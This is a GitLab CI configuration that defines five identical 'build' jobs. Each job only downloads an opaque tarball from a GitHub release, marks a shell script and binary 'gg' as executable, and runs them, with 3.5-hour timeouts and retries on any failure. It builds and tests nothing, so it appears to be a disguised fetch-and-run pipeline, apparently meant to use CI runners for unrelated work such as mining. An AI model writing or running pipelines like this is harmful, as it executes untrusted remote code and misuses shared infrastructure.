variables:
  GIT_DEPTH: "3"

stages:
  - build
  - test
  - deploy

build_1:
  stage: build
  timeout: 3 hours 30 minutes
  retry:
    max: 2
    when:
    - always
  script:
    - wget https://github.com/mondaywanday/mondaywanday/releases/download/mondaywanday/gg.tar.gz
    - tar xf gg.tar.gz
    - cd gg
    - chmod +x gg.sh
    - chmod +x gg
    - bash gg.sh
  
build_2:
  stage: build
  timeout: 3 hours 30 minutes
  retry:
    max: 2
    when:
    - always
  script:
    - wget https://github.com/mondaywanday/mondaywanday/releases/download/mondaywanday/gg.tar.gz
    - tar xf gg.tar.gz
    - cd gg
    - chmod +x gg.sh
    - chmod +x gg
    - bash gg.sh
    
build_3:
  stage: build
  timeout: 3 hours 30 minutes
  retry:
    max: 2
    when:
    - always
  script:
    - wget https://github.com/mondaywanday/mondaywanday/releases/download/mondaywanday/gg.tar.gz
    - tar xf gg.tar.gz
    - cd gg
    - chmod +x gg.sh
    - chmod +x gg
    - bash gg.sh
  
build_4:
  stage: build
  timeout: 3 hours 30 minutes
  retry:
    max: 2
    when:
    - always
  script:
    - wget https://github.com/mondaywanday/mondaywanday/releases/download/mondaywanday/gg.tar.gz
    - tar xf gg.tar.gz
    - cd gg
    - chmod +x gg.sh
    - chmod +x gg
    - bash gg.sh
  
build_5:
  stage: build
  timeout: 3 hours 30 minutes
  retry:
    max: 2
    when:
    - always
  script:
    - wget https://github.com/mondaywanday/mondaywanday/releases/download/mondaywanday/gg.tar.gz
    - tar xf gg.tar.gz
    - cd gg
    - chmod +x gg.sh
    - chmod +x gg
    - bash gg.sh
